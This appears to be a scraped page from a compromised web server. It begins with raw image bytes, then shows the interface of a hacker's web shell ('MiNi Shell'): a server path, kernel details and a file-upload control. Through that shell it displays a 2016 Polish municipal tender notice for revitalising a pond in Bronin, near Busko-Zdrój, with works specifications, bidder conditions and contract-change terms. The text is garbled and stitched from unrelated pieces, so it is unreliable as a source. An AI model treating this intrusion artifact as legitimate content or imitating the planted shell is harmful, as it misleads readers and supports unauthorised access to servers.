JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160705/119173-N-2016.html

<p class="kh_header"><b>Busko-Zdrój: Rewitalizacja stawu gminnego w Broninie - etap I</b><br>
<b>Numer ogłoszenia: 119173 - 2016; data zamieszczenia: 05.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja stawu gminnego w Broninie - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postanowienia ogólne:     Przedmiotem zamówienia jest wykonanie robót budowlanych dotyczących rewitalizacji stawu gminnego w Broninie - etap I.

Zakres prac obejmuje:
1. roboty w zakresie nawierzchni:
1.1. o nawierzchni tłuczniowej:  ścieżka utwardzona o szerokości 2,60m ze schodami terenowymi; ścieżka wokół kręgu ogniskowego szerokości 2,0m, ścieżka od placu utwardzonego do pomostu szerokości 3,20m:
- nawierzchnie  wykonane z kruszywa łamanego o ciągłym uziarnieniu 0/12,8mm 
  stabilizowanego mechanicznie grub. 10cm
- warstwa z kruszywa łamanego o ciągłym uziarnieniu 4/31,5mm stabilizowanego 
   mechanicznie grub. 10cm
- warstwa odcinająca z piasku grub. 10cm
- podłoże naturalne zagęszczone 
- całkowita grub. konstrukcji nawierzchni: 30cm
- krawężniki betonowe o wymiarach 15x30x100cm na podsypce cementowo-piaskowej 1:4 
   grub.5cm; ława pod krawężnik 35x30x15cm z betonu C8/10
- obrzeża betonowe o wymiarach 8x30x100cm na podsypce cementowo-piaskowej 1:4;
   ława pod krawężnik 18x5cm z betonu C8/10
- ułożenie rur osłonowych z PCW

1.2. krąg ogniskowy:
 - o średnicy 200cm;
 - wykonany z kamienia: granitu w postaci dwóch pierścieni: wewnętrznego zagłębionego i 
   zewnętrznego znajdującego się na poziomie terenu

1.3.plac utwardzony o nawierzchni z betonowej kostki brukowej:
 - nawierzchnie  wykonane z kostki brukowej grub. 8cm
 - podsypka cementowo-piaskowa 1:4 grub. 5cm
- warstwa z kruszywa łamanego o ciągłym uziarnieniu 0/31,5mm stabilizowanego 
   mechanicznie grub. 15cm
- warstwa odcinająca z piasku grub. 10cm
- podłoże naturalne zagęszczone 
- całkowita grub. konstrukcji nawierzchni: 38cm

2. roboty w zakresie zagospodarowania terenu:
 - kosze na śmieci:
 - ławka ogrodowa bez oparcia: drewniana, ustawiona na podsypce żwirowo-cementowej, 
 - stolik zewnętrzny: drewniany, ustawiony na utwardzonym placu za pomocą fundamentów 
    zagłębionych na 110m poniżej poziomu terenu; 
 - pniak do siedzenia: 
 - elementy zabezpieczone preparatem odpornym na  grzyby, owady i pleśnie. Drewno malowane  na kolor ciemnobrązowy (np.RAL 8011 - zbliżony do koloru altany);

3. roboty  w zakresie altany:
- altana zlokalizowana na utwardzonym placu , przewidzianym do organizowania imprez 
   okolicznościowych;
- wymiary altany: szerokość 4,10m, długość 6,00m, powierzchnia zabudowy 24,60m2, 
   kubatura 62,30m3, wysokość w świetle 2,46m, kąt spadku połaci dachu 35°;
 - altana zaprojektowana w kształcie prostokąta składającego się z 6 drewnianych słupów w 
   rozstawie osiowym 2,45m i 3,11m, posadowionych na betonowych stopach 
   fundamentowych;
 - fundament słupów z betonu B-15 o wymiarach 26x26cm z otworem nawiercanym 
    O40cm, zagłębiony na 110cm poniżej poziomu terenu.  Słupy drewniane z wydrążonymi 
    w stopie otworami o średnicy 30mm i głębokości 30cm, osadzone na rurze stalowej 
    O 30mm zamocowane j w fundamencie za pomocą kleju konstrukcyjnego;
 - słupy o przekroju 22x22 cm, krawędzie fazowane po 1cm na narożnikach, reszta słupa 
   wycięta do przekroju 18x18cm. Wysokość słupa 2,50m powyżej poziomu terenu;
 - dach czterospadowy o konstrukcji krokwiowo-belkowej. Kryty gontem grub. 2,5cm. 
    Krokwie o przekroju 12x14cm, belki pułapowe o przekroju 18x22cm, łaty o przekroju 
    6x8cm, miecze o przekroju 10x12cm;
 -  wszystkie elementy drewniane trzykrotnie impregnowane preparatem odpornym na 
    grzyby, owady i pleśnie. Drewno malowane na kolor ciemnobrązowy (np.RAL 8011);
 -  montaż altany na kostce brukowej, podsypka cementowo-piaskowa na podbudowie z 
    kruszywa łamanego.

4. roboty w zakresie pomostów:
 -  pomost wędkarski przeznaczony do korzystania z jeziora w zakresie wędkowania i zarybiania 
    oraz w celach rekreacyjnych;
 - konstrukcja pomostu: żelbetowa i drewniana - pomost składa się z 3 dźwigarów drewnianych z 
   drewna sosnowego (każdy podparty na 2 żelbetowych palach (słupach)) oraz 3 kręgów 
   żelbetowych posadowionych przy linii brzegowej stawu. Na dźwigarach ułożone będą podłużnice 
   do których przymocowane będą deski pomostu;
-  pomost w kształcie prostokąta o wymiarach: 2,5x7,0m, nośność punktowa 10kN, maksymalna 
   rozpiętość przęsła: 2,25m, ilość przęseł: 3;
-  słupy żelbetowe: O30cm, oczepy 14x20cm, podłużnice 14x20cm, deski 14x14cm, kręgi 
   żelbetowe O 80cm i O 100cm;
-  wszystkie elementy metalowe wbudowane w pomost muszą być dokładnie oczyszczone  oraz 
    pomalowane farbą podkładową i dwukrotnie farba nawierzchniową
-  wszystkie elementy drewniane  -  impregnowane (przed impregnacją drewno należy 
   całkowicie wyczyścić z brudu i trocin).

5. Wytyczne i uwagi Zamawiającego:
5.1.Przedstawione w dokumentacji urządzenia mają charakter przykładowy, obrazujący minimalne parametry techniczne oraz jakościowe zastosowanych urządzeń i rozwiązań,             uzgodnione z Inwestorem.
Zamawiający dopuszcza zastosowanie innych produktów niż podane w kompleksowej dokumentacji, w tym projekcie budowlano-wykonawczym, STWiORB, przedmiarach robót - pod warunkiem, że będą one o parametrach technicznych i jakościowych równoważnych lub nie gorszych niż przyjęto w w.w. dokumentach.  W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów uwiarygodniających przedmiotowe parametry. Przedstawione dokumenty będą weryfikowane przez Projektanta.
Przedstawione w dokumentacji projektowej i przedmiarze robót oraz pozostałej dokumentacji wskazania na systemy i materiały z podaniem producenta należy traktować  jako przykładowe ze względu na zasady Prawo Zamówień Publicznych, a zwłaszcza art 29 - 31. Oznacza to, że dopuszcza się zastosowanie innych niż wyszczególnione w dokumentacji rozwiązań z zachowaniem odpowiednich, równoważnych parametrów technicznych i jakościowych z zapewnieniem uzyskania wszystkich ewentualnie wymaganych uzgodnień.
5.2.Elementy pochodzące z rozbiórki/demontażu takie jak: stara scena oraz istniejący pomost           drewniany Wykonawca zutylizuje na własny koszt. 
5.3.Roboty odtworzeniowe i porządkowe należy uwzględnić w cenie 	oferty - nawet w przypadku pominięcia ich w przedmiarach. 

6. Szczegółowy zakres robót określają:
a) projekt umowy - załącznik nr 8 do SIWZ;
b) przedmiary robót - załącznik nr 9 do SIWZ;
c) specyfikacja techniczna wykonania i odbioru robót budowlanych  - załącznik nr 10 do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, tekst jednolity (Dz. U. z 2015 poz. 2164) o wartości nieprzekraczającej 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.11.12.91-4, 45.21.13.20-8, 45.21.33.53-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 najważniejszych zamówień polegających na wykonaniu zagospodarowania terenu obejmującego wykonanie utwardzonych nawierzchni z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że przy realizacji zamówienia  będzie dysponował min. 1 osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności drogowej wraz z oświadczeniem, że osoba ta posiada wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań dot. powyższego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć: 
1.	Wypełniony formularz ofertowy z wykorzystaniem wzoru w/g Załącznika 1,
 2. Kosztorys ofertowy uproszczony przygotowany na podstawie przedmiaru robót (Załącznik nr 9 do SIWZ), szczegółowych specyfikacji technicznych, zawierający wygenerowane ceny jednostkowe. Cena jednostkowa poszczególnych pozycji kosztorysowych musi być wyrażona z dokładnością do dwóch miejsc po przecinku, musi zawierać wszystkie narzuty i być podana bez podatku VAT.
3. Pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych tych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Okres gwarancji - 6</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru     Wykonawcy, może nastąpić w przypadku: 
a)	wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na skutek okoliczności, których nie można było przewidzieć na etapie przygotowania inwestycji do realizacji,
b)	wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy (termin, zakres, wartość Umowy),
c)	wystąpienia konieczności wprowadzenia Podwykonawcy na budowę, pomimo braku jego zgłoszenia w Ofercie - po uprzedniej akceptacji Podwykonawcy przez Zamawiającego.

3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie której
     dokonano wyboru Wykonawcy, może nastąpić w przypadkach gdy: 
a) opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy t.j. siła wyższa (np.: klęska żywiołowa, niesprzyjające warunki atmosferyczne). Termin ten zostaje wówczas przedłużony o czas trwania zaistniałych okoliczności - do czasu ustąpienia tych okoliczności;
b) wystąpią roboty dodatkowe lub zamienne;
c) wystąpią na nieruchomości zdarzenia niemożliwe do przewidzenia wcześniej (np. odsłonięcia archeologiczne);
d) wystąpi konieczność uzyskania od organów administracji państwowej dodatkowych decyzji, uzgodnień, pozwoleń, niezbędnych do realizacji zadania;
            e) wystąpią niezależne od Wykonawcy opóźnienia w dostawach materiałów budowlanych,  
             których nie można pozyskać od innych producentów (dostawców) 
f) przedłuży się procedura przetargowa, w związku z wniesionymi odwołaniami lub przedłużeniem okresu związania ofertą.
4. Zmiana zakresu rzeczowego umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadku wystąpienia różnic w obmiarach w stosunku do przedmiarów robót.
5. Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach:
a) rozliczenia wykonanych robót kosztorysem powykonawczym, na podstawie wskaźników cenowych ujętych w kosztorysie ofertowym, w oparciu o dokonany przez Inspektora nadzoru obmiar robót;
b)zmniejszenia zakresu rzeczowego Umowy, na skutek okoliczności, których nie można było przewidzieć na etapie przygotowania inwestycji do realizacji;
c) wprowadzenia rozwiązań zamiennych niezbędnych z punktu widzenia realizacji całości zamówienie, których nie można było wcześniej przewidzieć (np. ukryte wady projektowe ujawnione na etapie realizacji inwestycji, rozbieżności w stosunku do założeń projektowych) polegające np. na zamianie technologii wykonania danego elementu, jego parametrów, materiałów użytych do jego wykonania                                                                                                  d) urzędowych zmian w obowiązujących przepisach, podatkowych, w tym zmiany w podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2016 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com